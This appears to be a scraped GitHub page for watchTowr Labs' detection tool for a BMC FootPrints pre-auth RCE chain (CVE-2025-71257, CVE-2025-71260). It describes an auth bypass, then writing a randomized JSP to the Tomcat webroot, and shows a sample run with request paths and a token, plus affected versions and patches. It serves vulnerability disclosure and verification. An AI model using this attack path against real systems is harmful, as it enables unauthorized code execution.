watchtowrlabs/watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260

GitHub: watchtowrlabs/watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260

BMC FootPrints 预认证 RCE 漏洞链检测工具,通过组合 CVE-2025-71257 认证绕过和 CVE-2025-71260 代码执行来验证目标系统安全性。

Stars: 1 | Forks: 0

# CVE-2025-71257 和 CVE-2025-71260 BMC FootPrints 预认证远程代码执行链 BMC FootPrints 预认证远程代码执行链检测工件生成工具 # 描述 此检测工件生成器用于验证 BMC FootPrints 实例是否存在 CVE-2025-71257 和 CVE-2025-71260 漏洞。 检测工件生成器尝试执行两个操作: * 利用 CVE-2025-71257 绕过认证 - 此检查非常准确。 * 如果成功,它会尝试通过向 Tomcat 服务器的 webroot 写入一个随机化的 .jsp 文件来验证 CVE-2025-71260 RCE。该 .jsp 文件仅用于枚举系统信息。 # 检测实战 针对易受攻击实例的测试: ``` python3 watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py http://192.168.2.2 __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ watchTowr-vs-BMC-Footprints-RCE-CVE-2025-71257-CVE-2025-71260.py (*) BMC Footprints Authentication Bypass and Remote Code Execution Detection Artifact Generator Tool - Sonny , watchTowr (sonny@watchTowr.com) CVEs: [CVE-2025-71257, CVE-2025-71260] ============================================================ Detection Artifact Generator Tool ============================================================ Target: http://192.168.2.2 [+] Making first request to: http://192.168.2.2/footprints/servicedesk/passwordreset/request/ [+] Successfully extracted SEC_TOKEN: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h [+] Making second request to: http://192.168.2.2footprints/servicedesk/aspnetconfig [+] Using token: wgLCxepla-NTW9VSXIxyzNiq7HFJ0-CEFnbzlObKu3Ktv3B33h [+] Using randomized JSP name: MNdeu12Wf [+] Making third request to: http://192.168.2.2/MNdeu12Wf.jsp (randomized artifact) ================================================== EXTRACTED INFORMATION: ================================================== Username: LOCAL SERVICE Working Directory: C:\Program Files\Apache Software Foundation\Tomcat 9.0 ================================================== [+] Detection Artifact Generator Completed! ``` # 受影响版本 `BMC FootPrints:从 20.20.02 到 20.24.01.001` # 可用热修复补丁 `20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, 20.24.01` 参考:https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/ # 关注 [watchTowr](https://watchTowr.com) Labs 获取最新的安全研究动态,请关注 [watchTowr](https://watchTowr.com) Labs 团队 - https://labs.watchtowr.com/ - https://x.com/watchtowrcyber
标签:BMC FootPrints, CISA项目, CVE-2025-71257, CVE-2025-71260, ITSM, JSP, Maven, meg, PoC, RCE, Tomcat, Webshell, 信息安全, 暴力破解, 服务台系统, 漏洞验证, 编程工具, 认证绕过, 远程代码执行, 逆向工具